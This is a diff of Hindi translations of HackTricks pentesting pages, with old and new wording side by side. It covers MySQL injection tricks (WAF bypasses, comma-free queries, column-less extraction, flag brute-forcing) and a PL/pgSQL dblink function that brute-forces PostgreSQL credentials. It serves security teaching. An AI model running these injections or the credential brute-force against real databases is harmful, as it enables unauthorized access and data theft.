* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md) [**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें। * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।** * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।
</details> </details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके
</details> </details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उत्तेजक मिलन स्थल है हर विषय में। [**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है हर विषय में।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
@ -66,7 +66,7 @@ from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/]
## फ्लो ## फ्लो
ध्यान रखें कि "आधुनिक" **MySQL** के संस्करणों में आप "_**information\_schema.tables**_" को "_**mysql.innodb\_table\_stats**_**"** के लिए प्रतिस्थापित कर सकते हैं (यह WAFs को छलने के लिए उपयोगी हो सकता है)। ध्यान रखें कि "आधुनिक" संस्करणों में **MySQL** में आप "_**information\_schema.tables**_" को "_**mysql.innodb\_table\_stats**_**"** के लिए प्रतिस्थापित कर सकते हैं (यह WAFs को छलने के लिए उपयोगी हो सकता है)।
```sql ```sql
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
@ -91,7 +91,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
* `SELECT LEFT(version(),1...lenght(version()))='asd'...` * `SELECT LEFT(version(),1...lenght(version()))='asd'...`
* `SELECT INSTR('foobarbar', 'fo...')=1` * `SELECT INSTR('foobarbar', 'fo...')=1`
## कॉलमों की संख्या का पता लगाएं ## कॉलमों की संख्या का पता लगाना
एक सरल ORDER का उपयोग एक सरल ORDER का उपयोग
``` ```
@ -115,15 +115,15 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
``` ```
## SSRF ## SSRF
**यहाँ विभिन्न विकल्प सीखें** [**एक Mysql इन्जेक्शन का दुरुपयोग करके SSRF प्राप्त करने के लिए**](mysql-ssrf.md)**।** **यहाँ सीखें कि** [**एक Mysql इंजेक्शन का दुरुपयोग करके SSRF प्राप्त करने के विभिन्न विकल्प**](mysql-ssrf.md)**।**
## WAF बायपास ट्रिक्स ## WAF बायपास ट्रिक्स
### जानकारी\_स्कीमा विकल्प ### जानकारी\_स्कीमा विकल्प
ध्यान रखें कि "आधुनिक" **MySQL** के संस्करणों में आप _**information\_schema.tables**_ को _**mysql.innodb\_table\_stats**_ या _**sys.x$schema\_flattened\_keys**_ या **sys.schema\_table\_statistics** के लिए प्रतिस्थापित कर सकते हैं। ध्यान रखें कि "आधुनिक" **MySQL** के "संस्करणों" में आप _**information\_schema.tables**_ को _**mysql.innodb\_table\_stats**_ या _**sys.x$schema\_flattened\_keys**_ या **sys.schema_table_statistics** के लिए प्रतिस्थापित कर सकते हैं।
### COMMAS के बिना MySQL इन्जेक्शन ### COMMAS के बिना MySQL इजेक्शन
कोई कमा उपयोग किए बिना 2 स्तंभ चुनें ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)): कोई कमा उपयोग किए बिना 2 स्तंभ चुनें ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
``` ```
@ -131,13 +131,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
``` ```
### कॉलम के नाम के बिना मानों को पुनः प्राप्त करना ### कॉलम के नाम के बिना मानों को पुनः प्राप्त करना
यदि किसी समय आपको तालिका का नाम पता है लेकिन आपको तालिका में कॉलमों का नाम नहीं पता है, तो आप कोशिश कर सकते हैं कि कितने कॉलम हैं उन्हें ढूंढने के लिए कुछ ऐसा निष्पादन करके: यदि किसी समय आपको तालिका का नाम पता है परंतु आपको तालिका के अंदर कॉलम का नाम पता नहीं है, तो आप कोशिश कर सकते हैं कि कितने कॉलम हैं उन्हें ढूंढने के लिए कुछ ऐसा क्रियान्वित करके पता लगाएं:
```bash ```bash
# When a True is returned, you have found the number of columns # When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2columns select (select "", "") = (SELECT * from demo limit 1); # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
``` ```
मान लीजिए कि 2 स्तंभ हैं (पहला स्तंभ ID है) और दूसरा झंडा है, तो आप झंडे की सामग्री को ब्रूटफोर्स करने के लिए प्रयास कर सकते हैं, एक अक्षर से दूसरे अक्षर तक: यदि 2 स्तंभ हैं (पहला स्तंभ ID है) और दूसरा झंडा है, तो आप झंडे की सामग्री को ब्रूटफोर्स करने के लिए प्रयास कर सकते हैं, अक्षर के अक्षर को कोशिश करके:
```bash ```bash
# When True, you found the correct char and can start ruteforcing the next position # When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1); select (select 1, 'flaf') = (SELECT * from demo limit 1);
@ -146,7 +146,7 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1);
### MySQL इतिहास ### MySQL इतिहास
आप **sys.x$statement\_analysis** तालिका पढ़कर MySQL के भीतर अन्य क्रियाएँ देख सकते हैं आप **sys.x$statement\_analysis** तालिका पढ़कर MySQL के अंदर अन्य क्रियाएँ देख सकते हैं
### संस्करण वैकल्पिक**s** ### संस्करण वैकल्पिक**s**
``` ```
@ -173,9 +173,9 @@ mysql> select version();
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* अपने [**NFTs**](https://opensea.io/collection/the-peass-family) के अनन्य संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके
</details> </details>

View file

@ -4,26 +4,26 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**. * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>
**इस हमले के बारे में [अधिक जानकारी के लिए मूल पेपर में देखें](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**. **इस हमले के बारे में अधिक जानकारी के लिए [मूल पेपर में जाएं](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.
PL/pgSQL एक **पूरी विशेषताएँ वाली प्रोग्रामिंग भाषा** है जो SQL की क्षमताओं को बढ़ाकर **प्रक्रियात्मक नियंत्रण** प्रदान करती है। इसमें लूप्स और विभिन्न नियंत्रण संरचनाएँ शामिल हैं। PL/pgSQL भाषा में बनाए गए फ़ंक्शन SQL वाक्यों और ट्रिगर्स द्वारा आह्वानित किए जा सकते हैं, जिससे डेटाबेस वातावरण में कार्रवाई की व्याप्ति बढ़ जाती है। PL/pgSQL एक **पूरी विशेषताएँ वाली प्रोग्रामिंग भाषा** है जो SQL की क्षमताओं को बढ़ाकर **प्रक्रियात्मक नियंत्रण** प्रदान करती है। इसमें लूप्स और विभिन्न नियंत्रण संरचनाएँ शामिल हैं। PL/pgSQL भाषा में बनाए गए फ़ंक्शन SQL वाक्यों और ट्रिगर्स द्वारा आह्वान किए जा सकते हैं, जिससे डेटाबेस वातावरण में कार्रवाई की व्याप्ति बढ़ जाती है।
आप इस भाषा का दुरुपयोग करके PostgreSQL से उपयोगकर्ताओं के क्रेडेंशियल्स को ब्रूटफ़ोर्स करने के लिए इस्तेमाल कर सकते हैं, लेकिन यह डेटाबेस पर मौजूद होना चाहिए। आप इसकी मौजूदगी की जांच करने के लिए इस्तेमाल कर सकते हैं: आप इस भाषा का दुरुपयोग करके PostgreSQL से उपयोगकर्ताओं के क्रेडेंशियल्स को ब्रूटफ़ोर्स करने के लिए इस्तेमाल कर सकते हैं, लेकिन यह डेटाबेस पर मौजूद होना चाहिए। आप इसकी मौजूदगी की जांच कर सकते हैं:
```sql ```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql'; SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl lanname | lanacl
---------+--------- ---------+---------
plpgsql | plpgsql |
``` ```
डिफ़ॉल्ट रूप से, **फ़ंक्शन बनाना एक विशेषाधिकार है जो सार्वजनिक को प्रदान किया गया है**, जहां सार्वजनिक उस डेटाबेस सिस्टम पर हर उपयोगकर्ता को संदर्भित करता है। इसे रोकने के लिए, प्रशासक को सार्वजनिक डोमेन से USAGE विशेषाधिकार को रद्द करना पड़ सकता था: डिफ़ॉल्ट रूप से, **फ़ंक्शन बनाना एक विशेषाधिकार है जो सार्वजनिक को प्रदान किया गया है**, जहां सार्वजनिक उस डेटाबेस सिस्टम पर हर उपयोगकर्ता को संदर्भित करता है। इसे रोकने के लिए, प्रशासक को सार्वजनिक डोमेन से USAGE विशेषाधिकार वापस लेना पड़ सकता था:
```sql ```sql
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC; REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
``` ```
@ -34,7 +34,7 @@ lanname | lanacl
---------+----------------- ---------+-----------------
plpgsql | {admin=U/admin} plpgsql | {admin=U/admin}
``` ```
नोट करें कि निम्नलिखित स्क्रिप्ट काम करने के लिए **फ़ंक्शन `dblink` मौजूद होना चाहिए**। अगर यह मौजूद नहीं है, तो आप इसे निम्नलिखित के साथ बनाने की कोशिश कर सकते हैं। नोट करें कि निम्नलिखित स्क्रिप्ट काम करने के लिए **फ़ंक्शन `dblink` मौजूद होना चाहिए**। अगर यह मौजूद नहीं है तो आप इसे निम्नलिखित के साथ बनाने की कोशिश कर सकते हैं।
```sql ```sql
CREATE EXTENSION dblink; CREATE EXTENSION dblink;
``` ```
@ -79,9 +79,9 @@ $$ LANGUAGE 'plpgsql';
//Call the function //Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres'); select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
``` ```
_ध्यान दें कि 4 वर्णों का ब्रूट फोर्सिंग करना कई मिनट ले सकता है।_ _ध्यान दें कि 4 वर्णों का ब्रूट फोर्सिंग कई मिनट ले सकता है।_
आप एक **वर्डलिस्ट डाउनलोड** भी कर सकते हैं और केवल उन पासवर्ड का प्रयास कर सकते हैं (शब्दकोश हमला): आप भी **एक शब्द सूची डाउनलोड** कर सकते हैं और केवल उन पासवर्ड की कोशिश कर सकते हैं (शब्दकोश हमला):
```sql ```sql
//Create the function //Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT, CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
@ -120,10 +120,10 @@ select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) को PRs सबमिट करके * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -4,27 +4,27 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हूं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **[हैकिंग ट्रिक्स साझा करें, hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details> </details>
## PostgreSQL Extensions ## PostgreSQL Extensions
